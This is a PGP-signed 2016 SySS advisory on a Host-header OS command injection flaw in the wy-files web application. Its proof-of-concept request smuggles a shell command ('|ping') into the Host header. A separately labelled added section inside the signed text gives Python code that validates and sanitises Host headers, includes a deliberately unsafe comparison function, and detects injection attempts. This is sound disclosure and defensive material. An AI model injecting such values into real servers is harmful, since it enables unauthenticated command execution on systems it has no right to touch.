-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA512

Advisory ID: SYSS-2016-040
Product: wy-files
Manufacturer: wycomco GmbH
Affected Version(s): Unspecified
Tested Version(s): Unspecified
Vulnerability Type: OS Command Injection (CWE-78)
Risk Level: High
Solution Status: Fixed
Manufacturer Notification: 2016-05-09
Solution Date: 2016-06-16
Public Disclosure: 2016-07-18
CVE Reference: Not yet assigned
Author of Advisory: Sascha Muenzberg, SySS GmbH

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Overview:

wy-files is a web-based file transfer application provided by the
wycomco GmbH.

Due to improper input validation, the web application is vulnerable to
OS Command Injection attacks.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Vulnerability Details:

SySS GmbH found out that the web application uses the HTTP Host header
from at least one POST request inside an OS command without further
input validation.

This vulnerability allows an unauthenticated attacker to inject and
execute arbitrary OS commands.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Proof of Concept (PoC):

The following HTTP request using the attack vector
'|ping -c 21 127.0.0.1 # can be used to show that the ping command is
executed and causes a delay of the response.

POST /fst/Login/login.html HTTP/1.1
Host: example.com'|ping -c 21 127.0.0.1 #
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 197

mail=syss&password=syss&hash=test

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Solution:

According to information by the wycomco GmbH, the reported security
vulnerability has been fixed in a new software release.

Please contact the manufacturer for further information or support.
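Added example (not code from wycomco GmbH or SySS GmbH): the root cause described above is a request header reaching a shell command line unvalidated. The block shows the two defensive halves of a fix for that pattern, a strict Host header validator backed by a configured allowlist and a command invocation that passes the host as a single argv element with no shell in between, plus a detection helper that flags Host headers carrying shell metacharacters in captured requests. The allowlist, the hostcheck.sh helper name and the sample requests are constructed for this example; the first sample reuses the PoC header from the advisory.

```python
import re

# Constructed allowlist: the only host names the application is deployed under.
ALLOWED_HOSTS = {"example.com", "files.example.com"}

# RFC 1123 host name with an optional :port. Anything else, including every
# shell metacharacter, fails this match.
HOST_RE = re.compile(
    r"^[a-z0-9](?:[a-z0-9-]{0,61}[a-z0-9])?"
    r"(?:\.[a-z0-9](?:[a-z0-9-]{0,61}[a-z0-9])?)*"
    r"(?::\d{1,5})?$"
)

# Characters that have meaning to a POSIX shell; used only for alerting.
SHELL_META = re.compile(r"[|;&`$'\"\\<>(){}\n\r#]")


def validate_host(header_value):
    """Return the canonical host name, or None when the header is not one
    of the configured hosts. Validation happens before any use, so a rejected
    request never reaches command construction."""
    value = header_value.strip().lower()
    if len(value) > 260 or not HOST_RE.match(value):
        return None
    host = value.split(":", 1)[0]  # drop the port for the allowlist check
    return host if host in ALLOWED_HOSTS else None


def build_shell_command_unsafe(host):
    """The flawed pattern: the raw header interpolated into a shell string
    that would later run through a shell (e.g. subprocess.run(..., shell=True)).
    Shown for comparison only; nothing here executes it."""
    return "hostcheck.sh '%s'" % host


def build_argv_safe(host):
    """The fixed pattern: validate first, then hand the host to the helper as
    one argv element (subprocess.run(argv) without shell=True). Returns None
    when the request must be rejected."""
    valid = validate_host(host)
    if valid is None:
        return None
    return ["hostcheck.sh", valid]


def extract_host(raw_request):
    """Return the Host header value of a raw HTTP request, or None."""
    for line in raw_request.splitlines():
        name, sep, value = line.partition(":")
        if sep and name.strip().lower() == "host":
            return value.strip()
    return None


def flag_suspicious_host_headers(raw_requests):
    """Detection side: return Host header values that contain shell
    metacharacters or fail validation, for alerting on captured traffic."""
    findings = []
    for raw in raw_requests:
        value = extract_host(raw)
        if value is None:
            continue
        if SHELL_META.search(value) or validate_host(value) is None:
            findings.append(value)
    return findings


# Constructed sample requests: the advisory's PoC header and a benign one.
SAMPLE_REQUESTS = [
    "POST /fst/Login/login.html HTTP/1.1\r\n"
    "Host: example.com'|ping -c 21 127.0.0.1 #\r\n"
    "Connection: close\r\n\r\nmail=syss&password=syss&hash=test",
    "POST /fst/Login/login.html HTTP/1.1\r\n"
    "Host: files.example.com:443\r\n"
    "Connection: close\r\n\r\nmail=syss&password=syss&hash=test",
]

if __name__ == "__main__":
    for req in SAMPLE_REQUESTS:
        host = extract_host(req)
        print(repr(host), "->", build_argv_safe(host))
    print("flagged:", flag_suspicious_host_headers(SAMPLE_REQUESTS))
```

The allowlist matters as much as the syntax check: a syntactically clean but unexpected host name is still rejected, which also closes off Host header poisoning of generated links. Web servers and reverse proxies can enforce the same allowlist in front of the application, so an unexpected Host never reaches application code at all.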
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Disclosure Timeline:

2016-05-03: Vulnerability discovered
2016-05-09: Vulnerability reported to manufacturer
2016-06-16: Vulnerability fixed by manufacturer
2016-07-18: Public disclosure of vulnerability

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

References:

[1] SySS GmbH, SYSS-2016-040
    https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2016-040.txt
[2] SySS GmbH, SySS Responsible Disclosure Policy
    https://www.syss.de/en/responsible-disclosure-policy/

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Credits:

Security vulnerability found by Sascha Muenzberg of the SySS GmbH.

E-Mail: sascha.muenzberg@syss.de
Public Key: https://www.syss.de/fileadmin/dokumente/PGPKeys/Sascha_Muenzberg.asc
Key ID: 0x73033C4F
Key Fingerprint: 63FF 27B8 3E36 5475 1C0E CB5D 27C6 0C38 7303 3C4F

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Disclaimer:

The information provided in this security advisory is provided "as is"
and without warranty of any kind. Details of this security advisory may
be updated in order to provide as accurate information as possible. The
latest version of this security advisory is available on the SySS Web
site.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Copyright:

Creative Commons - Attribution (by) - Version 3.0
URL: http://creativecommons.org/licenses/by/3.0/deed.en

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1

iQIcBAEBCgAGBQJXjMBjAAoJECfGDDhzAzxPa3kQAMfLV7itcSY7W9lAU55B3HHL
xqtD4kud0P1JLcUYJMVI2iybfxwee/SMtZlG6ZYXZgeQd7lt/lxE/MkmTnw8oyh5
eD50J6UtKQLf15463boa7CFZD0esd+EaTg6hSD+pY/PjeK2M8S5WpRfwNrNNrq9b
/D2OHKWbbWkNeOqw+NFB0x2SMQC1uFA0NaXtiW20TE9m0Z42BB228VH5CXoQrcbK
eTWFr0HA73rY6ONCJGy6My6NP/W6CC6jrruH/TnAXetbMUqNgmQPQLYFNW2TLV1Y
dA0mzTPKE1nyQsBPi24gPZG3iJodjdaYLvwSzP8/jfeVQSpiu4A6yYOGxyW5maXc
EYClK7LEOmnGiUbK5aLEqKmpDuUxzp0O4taq033nSP4Ya0xyEkEwXZe74Hesao4V
ITJoVenKWXqYm9ErNKlLal9dAA7a0wiZDCfZce+4zzD7GCb0djlIsFJnwLTvZR+r
EETqDrvoBP/MdkrTNtt4EmpdvkYUfDepGhpPMe8VeufQRhVW0Yh5ekF91uu65Dye
97LYy+5sdDpyJkjgDM/USXJsFAopLZ2FTg1ZxuVlpFUSzIaM3dw+hm8FpAP3XMmr
6CYB8TkopZkOU/GYNZ9bX7L+2uojh1pdfxi7yixM0NdltKEBm1/7JafRsEhML1zb
CUY6q/Zn/XLVlBup1NDk
=NfKP
-----END PGP SIGNATURE-----